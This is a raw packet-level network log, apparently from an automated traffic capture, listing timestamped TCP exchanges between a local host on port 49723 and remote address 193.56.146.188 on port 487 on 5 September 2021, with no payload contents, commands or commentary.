Sep 5, 2021 15:50:11.050712109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050728083 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050754070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050791979 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050803900 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050823927 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050858974 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050873041 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.050893068 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.050940990 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.099869013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.099930048 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.099958897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.099988937 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100018978 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100059032 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100095034 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100111961 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100131989 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100135088 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100138903 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100169897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100187063 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100205898 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100243092 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100259066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100281000 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100327969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100332975 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100368977 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100406885 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100420952 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100445032 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100481987 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100493908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.100517988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.100565910 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.102725983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102778912 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102817059 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102838039 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.102855921 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102894068 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102906942 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.102930069 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102967024 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.102977037 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103013992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103055954 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103066921 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103091955 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103142977 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103166103 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103204012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103233099 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103259087 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103270054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103307962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103322029 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103343964 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103390932 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103394032 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103431940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103467941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103482962 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103506088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103543997 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103557110 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103579998 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103616953 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103630066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103653908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103698969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103703022 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103744030 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103780031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103792906 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103816986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103853941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103868961 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103889942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103926897 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.103938103 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.103964090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104008913 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104016066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104053020 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104089022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104103088 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104125977 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104162931 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104176044 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104198933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104237080 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104249001 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104274988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104321003 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104324102 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104362011 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104398966 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104413033 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104435921 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.104485035 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.104839087 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.146882057 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.463504076 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.463901043 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.494072914 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.532989979 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533046961 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533081055 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533174038 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533217907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533260107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533262968 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533313990 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533356905 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533360958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533410072 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533427954 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533473015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533515930 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533533096 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533570051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533612967 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533628941 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533667088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533706903 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533747911 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533763885 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533798933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533847094 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533858061 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533910990 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.533920050 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.533965111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534004927 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534024000 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534061909 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534104109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534122944 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534162045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534218073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534220934 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534279108 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534322977 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534341097 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534378052 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534416914 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534447908 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534471989 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534516096 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534533024 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534573078 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534611940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534641027 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534672022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534715891 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534734964 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534769058 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534809113 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534828901 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534863949 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534904957 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534920931 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.534957886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.534996986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535012960 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535058975 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535099983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535120964 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535203934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535242081 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535271883 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535295963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535341978 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535361052 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535396099 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535438061 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535461903 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535491943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535542965 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535561085 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535599947 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535638094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535676956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535685062 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535731077 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535758018 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535784006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535826921 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535856009 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535880089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.535942078 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.535943031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536000013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536036968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536068916 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536088943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536134005 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536159992 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536256075 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536302090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536319017 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536364079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536406994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536425114 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536462069 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536501884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536525011 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536557913 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536597013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536623001 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536654949 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536699057 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536741018 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536751986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536802053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536818981 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536848068 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536889076 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536905050 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.536945105 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.536994934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537003994 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537050962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537089109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537108898 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537250996 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537292957 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537312031 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537348032 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537389994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537427902 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537436962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537489891 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537507057 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537549973 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537604094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537623882 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537659883 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537704945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537745953 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537750006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537800074 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537838936 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537847042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537899971 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537925959 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.537957907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.537998915 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538027048 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538053036 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538094997 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538130999 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538142920 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538187981 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538196087 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538239956 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538289070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538307905 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538348913 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538388968 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538418055 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538443089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538486958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538513899 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538539886 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538583040 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538623095 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538631916 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538678885 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.538683891 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538732052 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538768053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.538796902 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.542016983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.543544054 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.608889103 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.608954906 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.608993053 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609030962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609066963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609108925 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609126091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609142065 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609188080 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609230995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609256983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609283924 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609283924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609338045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609375954 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609404087 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609431982 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609472036 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609494925 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609532118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609576941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609589100 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609631062 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609669924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609685898 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609724998 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609762907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609780073 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609819889 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609859943 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609875917 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.609920979 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609962940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.609980106 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610017061 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610058069 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610100031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610100985 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610148907 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610166073 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610208035 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610248089 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610296011 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610300064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610343933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610356092 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610400915 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610440016 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610455036 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610492945 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610543966 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610549927 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.610599041 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610636950 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.610655069 CEST	49723	487	192.168.2.4	193.56.146.188
